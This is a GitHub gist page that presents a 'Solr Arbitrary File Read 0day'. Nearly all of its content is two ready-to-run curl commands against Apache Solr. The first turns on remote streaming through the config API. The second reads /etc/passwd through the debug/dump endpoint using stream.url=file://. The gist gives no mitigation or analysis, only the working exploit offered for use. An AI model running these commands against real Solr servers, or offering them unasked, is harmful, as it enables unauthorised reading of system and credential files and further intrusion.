Skip to content

Instantly share code, notes, and snippets.

@0xf4n9x
Created March 17, 2021 14:33
Show Gist options
  • Save 0xf4n9x/2075ef36cc311a5e08aac983fc92e141 to your computer and use it in GitHub Desktop.
Save 0xf4n9x/2075ef36cc311a5e08aac983fc92e141 to your computer and use it in GitHub Desktop.
Solr Arbitrary File Read 0day Vulnerability
# ip="192.168.1.12:8983"
# curl -d '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://$ip/solr/db/config -H 'Content-type:application/json'
# curl "http://$ip/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment